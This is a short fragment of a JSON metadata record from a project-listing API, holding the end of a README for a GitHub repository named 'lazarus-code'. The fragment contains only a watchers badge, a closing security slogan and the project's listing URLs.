watchers](https://img.shields.io/github/watchers/toxy4ny/lazarus-code?style=social)\n\n---\n\n**Remember: Security is not a product, but a process. Stay vigilant! 🔐**\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftoxy4ny%2Flazarus-code","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftoxy4ny%2Flazarus-code","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftoxy4ny%2Flazarus-code/lists"}